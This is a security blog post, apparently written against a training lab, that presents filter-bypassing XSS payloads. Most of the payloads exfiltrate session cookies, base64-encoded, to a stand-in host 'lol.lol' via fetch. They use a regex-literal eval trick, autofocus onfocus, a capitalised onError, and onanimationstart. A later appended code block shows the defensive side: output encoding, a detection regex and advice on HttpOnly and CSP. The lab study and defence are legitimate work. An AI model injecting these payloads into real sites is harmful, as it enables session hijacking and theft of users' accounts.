Data Exfiltration with some FUN XSS Tricks
Some fun XSS payloads that I tried in order to exfiltrate user cookies via XSS…
XSS is one of the most fun client-side attacks, and it is still not gone, even after 20+ years! Amazing, isn’t it? It dates back to 1998 and it’s 2021 now. We still see a lot of XSS, and a lot of researchers have done great work sharing cool XSS payloads, including (in no particular order) Gareth Heyes, Dr. Mario Heiderich, Michał Bentkowski, BruteLogic, and many more…
In today’s post, I am going to talk about 4 XSS payloads that could be used to exfiltrate the user session in one of Thexssrat’s labs: http://23.239.9.22/cheeseBlog-2
One more payload will be shared, but that one is just for an alert :)
The Payloads
Let me start with an alert, and then we can set the expectations high with the 4 final payloads.
XSS Payload:
<script>eval(/Alert(document.cookie)/.source.toLowerCase())</script>
What’s so special about it?
If you just put alert(1), the webpage sends the payload back encoded, and thus no XSS! So in order to bypass that, I used a regex literal (/Alert(1)/), converted it to its string equivalent (using .source), and then converted that to lowercase.
Of course you could simply write alert in caps and convert it to lowercase, but then you would miss the point here… The neat trick is converting a regex to get its string equivalent :)
And talking of neat tricks let me share another bonus trick:
<script>eval(8680439..toString(30)+"(1337)")</script>
Try it out ;)
Found an alert? Do you know why it worked?
Here’s the post covering the answer to that:
Exfiltrating Session Cookie with XSS!
Okay, back to the main mission — exfiltrating session cookies via XSS!
Payload 1:
<script>fetch("//lol.lol?code="+btoa(document.cookie))</script>
A normal script tag using the fetch API to send the session cookie to our domain. As simple as that!
Payload 2:
<input onfocus="fetch('//lol.lol/?code='+btoa(document.cookie))" autofocus></input>
An input tag with an onfocus attribute containing the JS code that runs once the input field is in focus (that is, when the input box is clicked to bring it into focus). And using the autofocus attribute, we just did that! So it didn’t require any user interaction at all to get the cookie to the attacker using the fetch API. Again, not that hard, but we have levelled up a bit here…
Let’s move to the next one:
Payload 3:
<link rel=stylesheet href=1 onError="fetch('//lol.lol/?code='+btoa(document.cookie))">
Here, the link tag is used to load a stylesheet, and the onerror attribute contains the script that executes when loading fails! Notice that onerror is written as onError because of some filtering happening at the backend of this lab. HTML attribute names are case-insensitive, so the browser treats onError exactly like onerror, and capitalizing the E bypasses that validation. It worked :)
Again the fetch API sends the data. This was also quite easy but we saw yet another XSS trick. Let’s move on to the next payload now…
Payload 4:
<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="fetch('//lol.lol/?code='+btoa(document.cookie))"></section>
This one looks like it came from outer space, hahaha.
Nothing fancy here. It just defines an empty animation, assigns it to a section tag, and when the animation starts, our payload gets executed via the onanimationstart attribute.
Nice one, right!
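The two bypasses above (the capitalized Alert that dodged the alert filter, and onError dodging the onerror check) both come down to the lab filtering exact lowercase tokens. The following is an added example, not code from the post or the lab; it assumes a reconstructed blocklist of ["alert", "onerror"] and shows why context-aware output encoding, applied to every reflection, is the fix rather than a longer blocklist:

```javascript
// Added example, not code from the original post: a token blocklist like the
// lab's (an assumption drawn from the bypasses above) versus output encoding.
// Payloads quoted from the post, used only as input to the defences below.
const SAMPLES = {
  regexAlert: "<script>eval(/Alert(document.cookie)/.source.toLowerCase())</script>",
  fetchScript: '<script>fetch("//lol.lol?code="+btoa(document.cookie))</script>',
  autofocus: "<input onfocus=\"fetch('//lol.lol/?code='+btoa(document.cookie))\" autofocus>",
  linkOnError: "<link rel=stylesheet href=1 onError=\"fetch('//lol.lol/?code='+btoa(document.cookie))\">",
  animation: "<style>@keyframes x{}</style><section style=\"animation-name:x\" " +
    "onanimationstart=\"fetch('//lol.lol/?code='+btoa(document.cookie))\"></section>",
};

// Hypothetical reconstruction of the lab's filter: encode only when one of these
// exact lowercase tokens is present. A case change (onError) or a handler that is
// not on the list (onfocus, onanimationstart) passes untouched.
const BLOCKLIST = ["alert", "onerror"];
function naiveBlocklistFilter(input) {
  return BLOCKLIST.some((t) => input.includes(t)) ? encodeForHtml(input) : input;
}

// The real fix: render untrusted input as text in the HTML context by encoding
// every character that can open a tag, attribute or entity. Applied to every
// reflection regardless of content, so there is no token to disguise.
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Detection hint for logs or a WAF rule, not a substitute for encoding: a tag
// opener or any on*= attribute, matched case-insensitively so onError and
// onAnimationStart are caught too. Expect some false positives ("only=").
const INJECTION_HINT = /<[a-z]|\bon[a-z]+\s*=/i;
function looksLikeMarkupInjection(input) {
  return INJECTION_HINT.test(input);
}

// Per-sample summary: bypasses the blocklist unchanged? detected by the hint?
// and is the encoded form free of any raw tag, attribute or quote character?
function report() {
  return Object.fromEntries(Object.entries(SAMPLES).map(([name, p]) => [name, {
    bypassesNaiveFilter: naiveBlocklistFilter(p) === p,
    detected: looksLikeMarkupInjection(p),
    encodedIsInert: !/[<>"']/.test(encodeForHtml(p)),
  }]));
}
```

Every one of the five payloads passes the blocklist unchanged, is flagged by the case-insensitive hint, and is rendered inert by encoding; pairing the encoding with HttpOnly session cookies and a connect-src CSP directive also removes what these payloads read and where they can send it.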
Closing Thoughts
I hope you liked these XSS tricks, learnt something interesting, and had FUN!
Let me know your feedback in the comments below, and feel free to connect on Twitter: @_SecurityGOAT
Btw, if you would like to support my work, consider checking out my Patreon page, or you can even Buy Me a Coffee :)
See ya!
Until next time, keep learning and happy hacking.